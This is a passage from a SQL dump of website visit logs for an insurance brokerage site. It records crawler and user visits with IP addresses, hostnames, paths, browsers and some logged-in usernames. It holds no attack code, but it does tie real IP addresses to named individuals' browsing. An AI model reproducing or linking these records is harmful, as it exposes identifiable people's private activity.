+http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9879,'0b_2a188d0335c31f8e35208f41b74a438a','1459239227','5.9.98.130','static.130.98.9.5.clients.your-server.de','/insentives/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9882,'0b_2a188d0335c31f8e35208f41b74a438a','1459239229','5.9.98.130','static.130.98.9.5.clients.your-server.de','/licensing-contracting/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9884,'0b_2a188d0335c31f8e35208f41b74a438a','1459239231','5.9.98.130','static.130.98.9.5.clients.your-server.de','/carriers/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9885,'0b_2a188d0335c31f8e35208f41b74a438a','1459239233','5.9.98.130','static.130.98.9.5.clients.your-server.de','/contact/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9888,'0b_2a188d0335c31f8e35208f41b74a438a','1459239236','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-status/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9891,'0b_2a188d0335c31f8e35208f41b74a438a','1459239238','5.9.98.130','static.130.98.9.5.clients.your-server.de','/forms/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9893,'0b_2a188d0335c31f8e35208f41b74a438a','1459239244','5.9.98.130','static.130.98.9.5.clients.your-server.de','/igo/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9894,'0b_2a188d0335c31f8e35208f41b74a438a','1459239246','5.9.98.130','static.130.98.9.5.clients.your-server.de','/term-quotes/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9897,'0b_2a188d0335c31f8e35208f41b74a438a','1459239249','5.9.98.130','static.130.98.9.5.clients.your-server.de','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9900,'0b_2a188d0335c31f8e35208f41b74a438a','1459239251','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9902,'0b_2a188d0335c31f8e35208f41b74a438a','1459239254','5.9.98.130','static.130.98.9.5.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9903,'0b_2a188d0335c31f8e35208f41b74a438a','1459239256','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9906,'0b_2a188d0335c31f8e35208f41b74a438a','1459239259','5.9.98.130','static.130.98.9.5.clients.your-server.de','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9909,'0b_2a188d0335c31f8e35208f41b74a438a','1459239261','5.9.98.130','static.130.98.9.5.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9911,'0b_2a188d0335c31f8e35208f41b74a438a','1459239263','5.9.98.130','static.130.98.9.5.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9912,'0b_2a188d0335c31f8e35208f41b74a438a','1459239265','5.9.98.130','static.130.98.9.5.clients.your-server.de','/members/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9914,'0b_2a188d0335c31f8e35208f41b74a438a','1459239267','5.9.98.130','static.130.98.9.5.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9915,'0b_47b678ea173222240824fe6d5f17d7e0','1459240873','157.55.39.123','msnbot-157-55-39-123.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9918,'0b_eae1b53307eb01b3a808e14a91287a7c','1459245857','78.46.50.246','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(9921,'0b_eae1b53307eb01b3a808e14a91287a7c','1459245860','78.46.50.246','majestic12.co.uk','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(9923,'0b_eae1b53307eb01b3a808e14a91287a7c','1459245862','78.46.50.246','majestic12.co.uk','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(9926,'0b_167e42995f0f2ac9b1a4339d82581ca4','1459248508','209.95.51.106','d15f336a.setaptr.net','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinXP','Firefox 16','ua','','','','','','','0','0',0),(9927,'0b_4df44beb1e0a21a484de112f2710fe94','1459248689','66.249.73.187','crawl-66-249-73-187.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9930,'0b_2c96ce0e2d064e11b07f55cfe5ebe793','1459248904','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9932,'0b_d7e0762ea245bd3ef8816581be9f8fe7','1459249803','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9935,'0b_19ff92d0dd4b7e2148970f909f7766e9','1459250183','180.76.15.14','baiduspider-180-76-15-14.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(9936,'0b_69029403c337ff6e7249584a1d36c7f8','1459251645','66.249.73.187','crawl-66-249-73-187.googlebot.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(9938,'0b_fed57d52fba2a3148deb3dd84c2d3016','1459252579','157.55.39.123','msnbot-157-55-39-123.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9941,'0b_26423f92bed0891d181a4dcdd84acf1a','1459253275','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9942,'0b_2ae49c973555bfe6b094bb63ae1008a8','1459256230','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9944,'0b_60757b816316c64807a1df5d56ceab9f','1459256745','66.249.73.178','crawl-66-249-73-178.googlebot.com','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9945,'0b_e9d831ed5f3a16315832b8be57f39b4b','1459257305','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(9948,'0b_5feeffe73f92dcb5e8e34e17761976d4','1459257310','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(9951,'0b_5feeffe73f92dcb5e8e34e17761976d4','1459257316','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(9953,'0b_5feeffe73f92dcb5e8e34e17761976d4','1459257322','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(9956,'0b_f18c9d58773bfbd97a19efc604459c3d','1459259020','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9957,'0b_10d0b7e13100c0b8605c18bcfa78ee1b','1459259865','66.249.73.189','crawl-66-249-73-189.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9959,'0b_a76c5179fa8914ddd77a0146134f6901','1459259866','66.249.73.202','crawl-66-249-73-202.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(9960,'0b_10d0b7e13100c0b8605c18bcfa78ee1b','1459259866','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(9962,'0b_2e5cf0ed6f9ffb7c225d7c69df6b9cfd','1459260126','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9965,'0b_fac77d95def7432ae1a241bce509764b','1459260478','107.202.43.140','107-202-43-140.lightspeed.frokca.sbcglobal.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(9966,'0b_5149e2a85f5d922e4042c8f7afe6dd59','1459261214','107.182.231.91','6bb6e700.lon.100tb.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'Win7','Firefox 15','ua','','','','','','','0','0',0),(9969,'0b_130bb3ec9aec4dbbf7c6b9b7b0aa9b23','1459262287','180.76.15.29','baiduspider-180-76-15-29.crawl.baidu.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(9971,'0b_a3bbb9aacc97d926bbb3c6d15716f78b','1459262991','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(9972,'0b_a3bbb9aacc97d926bbb3c6d15716f78b','1459262991','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(9974,'0b_a3bbb9aacc97d926bbb3c6d15716f78b','1459262993','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(9975,'0b_a3bbb9aacc97d926bbb3c6d15716f78b','1459262996','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(9977,'0b_a3bbb9aacc97d926bbb3c6d15716f78b','1459263022','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(9980,'0b_972ac57df0f6399778153bcf061dd785','1459263306','157.55.39.123','msnbot-157-55-39-123.search.msn.com','/SSO/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9981,'0b_fce6d6581ad6ea75f1756dd2574d69fe','1459263740','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9984,'0b_fce6d6581ad6ea75f1756dd2574d69fe','1459263744','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9986,'0b_fce6d6581ad6ea75f1756dd2574d69fe','1459263746','69.175.67.58','newscan04.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9989,'0b_fce6d6581ad6ea75f1756dd2574d69fe','1459263762','69.175.67.58','newscan04.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9990,'0b_0e4d424cf4329d369c9492917704a6de','1459265711','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(9993,'0b_0e4d424cf4329d369c9492917704a6de','1459265713','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(9995,'0b_0e4d424cf4329d369c9492917704a6de','1459265725','75.99.148.62','ool-4b63943e.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(9996,'0b_ca1ae4aeb556abf2bde955abcae0102f','1459266560','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9998,'0b_867f60591dec00ad97a74a25614a4b97','1459266560','180.76.15.137','baiduspider-180-76-15-137.crawl.baidu.com','/carriers/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(9999,'0b_c6b21e21a447beed49062e05a8ef0c5f','1459266821','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10001,'0b_c6b21e21a447beed49062e05a8ef0c5f','1459266823','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10002,'0b_c6b21e21a447beed49062e05a8ef0c5f','1459266828','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10004,'0b_ea6c7a42ff6b965c3b450a3c14552336','1459266833','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(10005,'0b_ea6c7a42ff6b965c3b450a3c14552336','1459266834','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(10008,'0b_c6b21e21a447beed49062e05a8ef0c5f','1459266841','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(10011,'0b_ea6c7a42ff6b965c3b450a3c14552336','1459266880','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(10014,'0b_ea6c7a42ff6b965c3b450a3c14552336','1459266891','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/agent-tools/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','Shmuli','','0','51',0),(10016,'0b_138b1b7223ac472f20dbaad3ba900378','1459267455','188.40.95.70','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(10019,'0b_138b1b7223ac472f20dbaad3ba900378','1459267458','188.40.95.70','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(10020,'0b_07c37e70f0fe339fbfee64b4ff0a78c4','1459268593','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(10022,'0b_07c37e70f0fe339fbfee64b4ff0a78c4','1459268593','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(10025,'0b_07c37e70f0fe339fbfee64b4ff0a78c4','1459268595','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10026,'0b_07c37e70f0fe339fbfee64b4ff0a78c4','1459268600','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10029,'0b_07c37e70f0fe339fbfee64b4ff0a78c4','1459268601','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10031,'0b_fcb6d57412f572bfa50b946931a92f56','1459268608','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/carriers','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(10032,'0b_07c37e70f0fe339fbfee64b4ff0a78c4','1459268616','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10035,'0b_fcb6d57412f572bfa50b946931a92f56','1459268623','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(10037,'0b_07c37e70f0fe339fbfee64b4ff0a78c4','1459268633','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10038,'0b_07c37e70f0fe339fbfee64b4ff0a78c4','1459268635','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10041,'0b_07c37e70f0fe339fbfee64b4ff0a78c4','1459268666','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10044,'0b_7f424c89c8f73da6670ce4f0247acc81','1459268929','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(10046,'0b_7f424c89c8f73da6670ce4f0247acc81','1459268930','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(10047,'0b_ff5541cc0da99bb4bc2de86f908f27b9','1459268940','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10049,'0b_ff5541cc0da99bb4bc2de86f908f27b9','1459268941','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10050,'0b_cdff530d4212a1bfcd47d905cc9e8f35','1459269372','178.129.239.219','h178-129-239-219.dyn.bashtel.ru','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36','','',0,'WinVista','Chrome 28','ru','','','','','','','0','0',0),(10052,'0b_daaaa3b222d4465f49726ae636147b8a','1459270019','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10053,'0b_daaaa3b222d4465f49726ae636147b8a','1459270030','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10056,'0b_daaaa3b222d4465f49726ae636147b8a','1459270130','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10058,'0b_daaaa3b222d4465f49726ae636147b8a','1459270150','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10061,'0b_daaaa3b222d4465f49726ae636147b8a','1459270158','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 